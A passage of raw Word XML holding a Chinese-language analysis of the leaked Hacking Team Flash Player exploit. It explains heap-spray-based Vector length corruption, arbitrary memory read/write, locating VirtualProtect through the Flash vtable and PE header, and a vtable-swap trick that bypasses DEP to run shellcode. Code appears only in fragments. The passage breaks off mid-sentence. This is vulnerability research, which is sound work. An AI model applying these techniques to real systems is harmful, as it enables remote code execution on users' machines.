        </w:rPr>
        <w:t>接下来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要定位该</w:t>
      </w:r>
      <w:r w:rsidR="00657324" w:rsidRPr="004B1348">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector.&lt;uint&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00657324">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，泄露</w:t>
      </w:r>
      <w:r w:rsidR="00B7455F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00657324">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00657324">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00657324">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]的VA，这里通过MyClass2对象写入的0x</w:t>
      </w:r>
      <w:r w:rsidR="00657324">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>11223344</w:t>
      </w:r>
      <w:r w:rsidR="00657324">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即可完成定位：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00657324" w:rsidRDefault="00F939E4" w:rsidP="004B134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19CCE5F" wp14:editId="5AFE5760">
            <wp:extent cx="5200000" cy="1980952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32" w:rsidRDefault="006A2499" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先对占位的_va[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]的长度判断，不是0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3f0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的即为被篡改的_va[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]。</w:t>
      </w:r>
      <w:r w:rsidRPr="006A2499">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var k:int = 0x400 + 70;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k为v的索引，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x400 + 70</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以保证v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[k]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问到MyClass2空间的0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>11223344</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>某一个值，再通过</w:t>
      </w:r>
      <w:r w:rsidRPr="006A2499">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>do k-- while (v[k] == 0x11223344);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>精确定位k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存放的是HeapSpray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MyClass2的索引）</w:t>
      </w:r>
      <w:r w:rsidR="0003128A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,同时注意到v[k</w:t>
      </w:r>
      <w:r w:rsidR="0003128A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-4]</w:t>
      </w:r>
      <w:r w:rsidR="0003128A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存放的是</w:t>
      </w:r>
      <w:r w:rsidR="0003128A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>o1</w:t>
      </w:r>
      <w:r w:rsidR="0003128A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是MyClass2的this指针</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的Atom值</w:t>
      </w:r>
      <w:r w:rsidR="0003128A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，由于</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23" w:rsidRPr="004B1348">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector.&lt;uint&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与MyClass2相邻排布，那么（v[k</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-4]</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-1）&amp;</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fffff000 – 0x1000 + 8</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即为v</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[0]</w:t>
      </w:r>
      <w:r w:rsidR="00A54C23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的VA。</w:t>
      </w:r>
      <w:r w:rsidR="007A0FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有了0x</w:t>
      </w:r>
      <w:r w:rsidR="007A0FD8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>400003f0</w:t>
      </w:r>
      <w:r w:rsidR="007A0FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>长度的v和泄露VA的v</w:t>
      </w:r>
      <w:r w:rsidR="007A0FD8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[0]</w:t>
      </w:r>
      <w:r w:rsidR="007A0FD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，就可以构造任意地址读写的函数了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A0FD8" w:rsidRDefault="007A0FD8" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38BB0337" wp14:editId="71F93A6F">
            <wp:extent cx="6304762" cy="2971429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77" w:rsidRDefault="00A60077" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC31E9" w:rsidRPr="000B5B05" w:rsidRDefault="00CC31E9" w:rsidP="00CC31E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4) </w:t>
      </w:r>
      <w:r w:rsidRPr="003A18CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C198C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绕过DEP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E6">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有了任意地址读写的权限后，一般的利用手法是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E6">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD58E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>任意地址读写Vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C42E7B">
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>保存shellcode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&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C42E7B">
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00C42E7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>虚表指针指向shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00C42E7B">
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C42E7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>调用虚函数执行shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00C42E7B">
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E6">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在开启DEP后，shel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所在的内存由于没有执行权限导致shellcode无法执行成功，需要借助VirtualProtect修改shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所在的内存属性为可执行，</w:t>
      </w:r>
      <w:r w:rsidR="00A07591">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DEP的一般流程是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E6">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD58E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>任意地址读写Vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5331C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>读取f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>lash虚表指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6879">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>flash基址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6879">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>flash导入表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6879">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>VirtualProtect地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6E9B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>构造ROP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008504E6" w:rsidRDefault="008504E6" w:rsidP="008504E6">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后需要通过s</w:t>
      </w:r>
      <w:r w:rsidRPr="00186EF7">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tack_pivot(xchg eax,esp;retn)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将构造的ROP保存到栈中执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC31E9" w:rsidRDefault="00057BCE" w:rsidP="004B1348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xploit程序首先将shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存至</w:t>
      </w:r>
      <w:r w:rsidRPr="00057BCE">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_x32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00057BCE" w:rsidRDefault="00057BCE" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDD5408" wp14:editId="5733BF25">
            <wp:extent cx="6645910" cy="1270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33" w:rsidRDefault="00375A33" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再通过3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的函数读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00057BCE">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_x32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的VA：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00375A33" w:rsidRDefault="00FD7459" w:rsidP="004B134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9E6F0B" wp14:editId="663CE2A4">
            <wp:extent cx="4123809" cy="1190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B7" w:rsidRDefault="00CF5EB7" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接着VirtualProtect的VA则是通过</w:t>
      </w:r>
      <w:r w:rsidR="00824301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>泄露的flash虚表指针（MyClass2的this指针向前偏移3个索引处）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>暴力搜索</w:t>
      </w:r>
      <w:r w:rsidR="00A028E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PE头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004450BD" w:rsidRDefault="004450BD" w:rsidP="004B134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DE85FBE" wp14:editId="6C48A9C2">
            <wp:extent cx="6476190" cy="8495238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8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A7" w:rsidRDefault="00A475A7" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得VirtualProtect的VA后，一般做法是构造ROP，在通过Sound.toString()</w:t>
      </w:r>
      <w:r w:rsidR="00E723B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等一些容易定位的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>劫持EIP</w:t>
      </w:r>
      <w:r w:rsidR="00C66842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，调用VirtualProtect开启执行权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>执行shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，但是Hacking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Team的exploit程序却写的相当巧妙，</w:t>
      </w:r>
      <w:r w:rsidR="00C66842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>省去了复杂的ROP</w:t>
      </w:r>
      <w:r w:rsidR="005126F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001323DB" w:rsidRDefault="001323DB" w:rsidP="004B134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B4A0AEF" wp14:editId="12F6B9BD">
            <wp:extent cx="6304762" cy="5980952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70" w:rsidRDefault="00E12BA6" w:rsidP="004B1348">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CallVP()函数的代码不如一般ROP利用代码的</w:t>
      </w:r>
      <w:r w:rsidR="00B7322E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直观，</w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过注释大概</w:t>
      </w:r>
      <w:r w:rsidR="00816876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>思路</w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是先取得Payload</w:t>
      </w:r>
      <w:r w:rsidR="00155B59">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数对象的</w:t>
      </w:r>
      <w:r w:rsidR="00D715CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vtable</w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>替换</w:t>
      </w:r>
      <w:r w:rsidR="00A02B38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>某一虚函数</w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为VirtualProtect</w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>API地址，最终通过Payload.call.apply来调用VirtualProtect</w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A14A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>API。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F2151" w:rsidRDefault="00C45090" w:rsidP="00F134FD">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>具体原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947E72" w:rsidRDefault="00A730D4" w:rsidP="00F134FD">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Payload是FunctionObject类型，</w:t>
      </w:r>
      <w:r w:rsidR="00971FBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用Payload.call的时候，native</w:t>
      </w:r>
      <w:r w:rsidR="00971FBF">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00971FBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
